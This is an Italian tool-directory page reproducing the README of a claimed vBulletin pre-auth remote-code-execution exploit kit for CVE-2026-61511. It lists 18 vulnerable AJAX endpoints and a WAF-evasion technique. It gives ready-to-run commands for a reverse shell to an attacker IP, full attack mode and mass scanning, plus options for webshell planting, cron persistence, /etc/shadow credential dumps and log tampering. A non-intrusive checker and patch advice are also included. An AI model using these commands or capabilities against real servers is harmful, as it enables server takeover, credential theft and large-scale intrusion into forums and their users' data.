Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2026-61511-PoC-Exploit — CVE-2026-61511 – vBulletin Pre-Auth RCE (CVSS 9.8). Vulnerabilità 5.x/6.x (non corrette). Multi-exploit tramite Endpoint Pool, AJAX, bypass WAF PHPFuck. Toolkit completo: reverse shell, proxy, persistenza, webshell, operazioni sul database, controllo del firewall, gestione dei log, scansione di massa. 2 versioni: multi-exploit e safe-check. Python 3.8+ Usa eticamente, resta legale. 🔒 | Kitploit
Strumenti/GitHubGitHub/tc4dy/cve-2026-61511-poc-exploit
Mappatura della ReteAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPost-ExploitBypass WAFPenetration TestingStrumento di Accesso RemotoSviluppo Payload

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Sicurezza dei Database
GitHubtc4dy/cve-2026-61511-poc-exploit

CVE-2026-61511-PoC-Exploit

Vedi Repository
414 giorni faNon ancora revisionato

Informazioni

CVE-2026-61511 – vBulletin Pre-Auth RCE (CVSS 9.8). Vulnerabilità 5.x/6.x (non corrette). Multi-exploit tramite Endpoint Pool, AJAX, bypass WAF PHPFuck. Toolkit completo: reverse shell, proxy, persistenza, webshell, operazioni sul database, controllo del firewall, gestione dei log, scansione di massa. 2 versioni: multi-exploit e safe-check. Python 3.8+ Usa eticamente, resta legale. 🔒

Condividi

CVEPoC

CVE-2026-61511 – Exploit e Verificatore RCE Pre-Auth per vBulletin

Python 3.8+ CVSS Author vBulletin

⚠️ SOLO USO ETICO – TEST DI SICUREZZA AUTORIZZATI
Questo repository fornisce strumenti esclusivamente per professionisti della sicurezza autorizzati, blue team e penetration tester.
L'accesso non autorizzato a sistemi informatici è illegale ai sensi del CFAA (USA), Computer Misuse Act (UK), TCK 243/244 (Turchia) e leggi simili in tutto il mondo.


📖 Panoramica della Vulnerabilità

CVE‑2026‑61511 è una vulnerabilità di iniezione PHP eval() nel motore di rendering dei template AJAX di vBulletin.
Versioni interessate: 5.0.0 – 5.7.5 e 6.0.0 – 6.2.1.

Come funziona

  1. Molteplici endpoint di attacco – il bug esiste in diversi handler AJAX:

    • /ajax/render/pagenav
    • /ajax/api/ad/replaceAdTemplate
    • /ajax/render/widget_php
    • /ajax/render/widget_tabbedcontainer_tab_panel
    • Vari endpoint /ajax/api/content_* /getIndexableContent
  2. Codifica PHPFuck – il payload viene trasformato in una sequenza di operatori e numeri PHP che bypassa i filtri WAF e consente l'esecuzione di codice PHP arbitrario.

  3. Nessuna autenticazione richiesta – un attaccante può inviare una richiesta POST manipolata a qualsiasi endpoint vulnerabile ed eseguire comandi di sistema con i privilegi del server web.

  4. Impatto – compromissione totale del server, furto di dati, backdoor, movimento laterale e persistenza. Aggiorna la versione!

Patch

  • vBulletin 6.2.2 e Patch Level 1 per le versioni precedenti risolvono il problema.
  • Aggiorna sempre all'ultima versione.

🧰 Strumenti

ToolScopoUtente previsto
exploit.pyToolkit completo con reverse shell, persistenza, operazioni sui file, dump del database, gestione del firewall, gestione dei log, inoltro delle porte, distribuzione di chiavi SSH, scansione di rete e scansione di massa (multi-thread).

📊 Confronto delle Funzionalità


🎯 Riepilogo dei Casi d'Uso


⚙️ Installazione

root@kitploit:~
git clone https://github.com/tc4dy/CVE-2026-61511-PoC-Exploit
cd CVE-2026-61511-PoC-Exploit
pip install -r requirements.txt

Contenuto di requirements.txt:

root@kitploit:~
request
urllib3

Parametri 🌬️

Scenari

Pool di Endpoint 🅿️

🛡️ Uso Responsabile

  • Utilizza questi strumenti solo su sistemi di tua proprietà o per i quali hai esplicito permesso scritto di test.
  • L'accesso non autorizzato è illegale e non etico.
  • Gli autori non sono responsabili di qualsiasi uso improprio.
  • Segui sempre le leggi e le normative del tuo paese.

Questo software è fornito esclusivamente a scopi educativi e test di sicurezza autorizzati.

Scarica lo strumento
Red team / pentester autorizzati
safecheck.pyVerificatore non intrusivo che controlla la vulnerabilità senza eseguire alcun payload malevolo. Rileva la versione, testa tutti gli endpoint e genera un report dettagliato.Blue team / auditor di sicurezza
Funzionalitàexploit.pysafecheck.py
Rilevamento vulnerabilità✅✅
Rilevamento versione✅✅
Test multi-endpoint (18 percorsi)✅✅
Esecuzione comandi✅❌
Reverse shell✅❌
Upload/download file✅❌
Meccanismi di persistenza✅❌
Distribuzione web shell✅❌
Operazioni sul database✅❌
Raccolta informazioni di sistema✅✅
Gestione firewall✅❌
Gestione log✅❌
Inoltro porte✅❌
Distribuzione chiavi SSH✅❌
Scansione di rete✅❌
Scansione di massa (multi-thread)✅❌
Supporto proxy✅✅
Output report JSON✅✅
Menu interattivo✅❌
Modalità non intrusiva (sicura)❌✅
Modalità Verbose/Debug✅✅
Esecuzione comandi personalizzati✅❌
Concatenamento multi-comando✅❌
Lettura file remoti✅❌
Scrittura file remoti✅❌
Gestione utenti di sistema✅❌
Tecniche di bypass del firewall✅❌
Evasione WAF (PHPFuck)✅✅
ScenarioStrumento consigliato
Blue Team – verifica se la tua installazione vBulletin è vulnerabilesafecheck.py
Security Audit – valutazione della vulnerabilità non intrusivasafecheck.py
Red Team – test di penetrazione autorizzati con sfruttamento completoexploit.py
Bug Bounty – test di divulgazione responsabilesafecheck.py
Mass Scanning – verifica di più target per la vulnerabilitàexploit.py (solo rilevamento)
Incident Response – verifica se i sistemi sono compromessisafecheck.py
ParametroDescrizione
-t, --targetURL target (es. http://forum.com/vb)
--proxyProxy HTTP (es. http://127.0.0.1:8080)
--timeoutTimeout delle richieste in secondi (predefinito: 10)
--retryNumero di tentativi per percorso (predefinito: 3)
--outputSalva il report dettagliato in un file JSON
-v, --verboseOutput verboso
-q, --quietModalità silenziosa (output minimo)
--lhostRichiesto per l'exploit – IP per il callback
--lportPorta per il callback (predefinita: 4444)
--threadsThread per la scansione di massa (predefiniti: 5)
--exploitEsegui lo sfruttamento dopo il rilevamento
--fullAttacco completo (tutti i moduli)
--shellAvvia una reverse shell
--webshellInstalla webshell (/shell.php)
--persistInstalla persistenza (cron job)
--dumpDump del database
--dump-credsDump delle credenziali (/etc/passwd, /etc/shadow)
--interactiveMenu interattivo dopo la verifica riuscita
#ScenarioComando
1Controllo rapido della vulnerabilitàpython safecheck.py -t http://target.com/vb
2Scansione dettagliata con reportpython safecheck.py -t http://target.com/vb --output report.json -v
3Reverse shellpython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --lport 4444 --shell
4Attacco completo (tutti i moduli)python exploit.py -t http://target.com/vb --lhost 192.168.1.100 --full
5Scansione di massa da filepython exploit.py -l targets.txt --lhost 192.168.1.100 --threads 20 --output results.json
6Modalità menu interattivopython exploit.py -t http://target.com/vb --lhost 192.168.1.100 --interactive
#Endpoint
1/ajax/render/pagenav
2/ajax/render/pagenav?template=page
3/ajax/api/ad/replaceAdTemplate
4/ajax/render/widget_php
5/ajax/render/widget_tabbedcontainer_tab_panel
6/ajax/api/content_infraction/getIndexableContent
7/ajax/api/content_video/getIndexableContent
8/ajax/api/content_text/getIndexableContent
9/ajax/api/content_report/getIndexableContent
10/ajax/api/content_redirect/getIndexableContent
11/ajax/api/content_privatemessage/getIndexableContent
12/ajax/api/content_poll/getIndexableContent
13/ajax/api/content_photo/getIndexableContent
14/ajax/api/content_link/getIndexableContent
15/ajax/api/content_gallery/getIndexableContent
16/ajax/api/content_event/getIndexableContent
17/ajax/api/content_channel/getIndexableContent
18/ajax/api/content_attach/getIndexableContent